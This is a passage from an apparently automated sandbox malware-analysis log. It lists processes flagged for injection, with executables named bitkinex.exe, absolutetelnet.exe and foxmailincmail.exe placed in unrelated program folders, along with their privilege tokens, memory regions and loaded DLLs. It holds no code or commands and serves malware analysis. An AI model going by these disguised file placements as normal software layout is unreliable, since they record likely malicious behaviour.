AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4283 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4284 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4285 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4286 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4287 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4288 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4289 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4290 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4291 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4292 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4293 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4294 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4295 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4296 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 4297 start_va = 0x680000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 4298 start_va = 0x780000 end_va = 0x907fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 4299 start_va = 0x910000 end_va = 0xa90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 4300 start_va = 0xaa0000 end_va = 0xb5bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000aa0000" filename = "" Region: id = 4301 start_va = 0xc20000 end_va = 0xc2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 4302 start_va = 0xc70000 end_va = 0xc7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 4303 start_va = 0xd60000 end_va = 0xd76fff monitored = 0 entry_point = 0xd614a1 region_type = mapped_file name = "bitkinex.exe" filename = "\\Program Files (x86)\\Windows Photo Viewer\\bitkinex.exe" (normalized: "c:\\program files (x86)\\windows photo viewer\\bitkinex.exe") Region: id = 4304 start_va = 0xd80000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 4305 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4306 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4307 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4308 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4309 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4310 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 4311 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4312 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4313 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4314 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4315 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4316 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4317 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4318 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4319 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4320 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4321 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4322 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4323 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4324 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4325 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4326 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4327 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4328 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4329 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4330 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 207 os_tid = 0x1260 Thread: id = 208 os_tid = 0x1150 Process: id = "43" image_name = "absolutetelnet.exe" filename = "c:\\program files (x86)\\msbuild\\absolutetelnet.exe" page_root = "0x1860c000" os_pid = "0x1118" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\MSBuild\\absolutetelnet.exe\" " cur_dir = "C:\\Program Files (x86)\\MSBuild\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4235 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4236 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4237 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4238 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4239 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4240 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4241 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4242 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4243 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4244 start_va = 0x210000 end_va = 0x226fff monitored = 0 entry_point = 0x2114a1 region_type = mapped_file name = "absolutetelnet.exe" filename = "\\Program Files (x86)\\MSBuild\\absolutetelnet.exe" (normalized: "c:\\program files (x86)\\msbuild\\absolutetelnet.exe") Region: id = 4245 start_va = 0x230000 end_va = 0x2edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4246 start_va = 0x2f0000 end_va = 0x2f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 4247 start_va = 0x300000 end_va = 0x303fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 4248 start_va = 0x340000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 4249 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 4250 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4251 start_va = 0x7b0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 4252 start_va = 0x8b0000 end_va = 0xa37fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 4253 start_va = 0xa40000 end_va = 0xbc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 4254 start_va = 0xbd0000 end_va = 0x1fcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bd0000" filename = "" Region: id = 4255 start_va = 0x1fd0000 end_va = 0x208bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fd0000" filename = "" Region: id = 4256 start_va = 0x21a0000 end_va = 0x21affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 4257 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4258 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4259 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4260 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4261 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4262 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 4263 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4264 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4265 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4266 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4267 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4268 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4269 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4270 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4271 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4272 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4273 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4274 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4275 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4276 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4277 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4278 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4279 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4280 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4281 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4282 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 209 os_tid = 0x1258 Thread: id = 210 os_tid = 0x111c Process: id = "44" image_name = "foxmailincmail.exe" filename = "c:\\program files\\common files\\foxmailincmail.exe" page_root = "0x6a3aa000" os_pid = "0x11ac" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\Common Files\\foxmailincmail.exe\" " cur_dir = "C:\\Program Files\\Common Files\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4571 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4572 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4573 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4574 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4575 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4576 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4577 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4578 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4579 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4580 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4581 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4582 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4583 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 4584 start_va = 0x4d0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4585 start_va = 0x5d0000 end_va = 0x68dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4586 start_va = 0x790000 end_va = 0x917fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 4587 start_va = 0x920000 end_va = 0xaa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 4588 start_va = 0xab0000 end_va = 0xb6bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 4589 start_va = 0xb80000 end_va = 0xb8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 4590 start_va = 0xca0000 end_va = 0xcaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 4591 start_va = 0x1200000 end_va = 0x1216fff monitored = 0 entry_point = 0x12014a1 region_type = mapped_file name = "foxmailincmail.exe" filename = "\\Program Files\\Common Files\\foxmailincmail.exe" (normalized: "c:\\program files\\common files\\foxmailincmail.exe") Region: id = 4592 start_va = 0x1220000 end_va = 0x261ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Region: id = 4593 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4594 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4595 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4596 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4597 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4598 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 4599 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4600 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4601 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4602 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4603 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4604 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4605 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4606 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4607 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4608 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4609 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 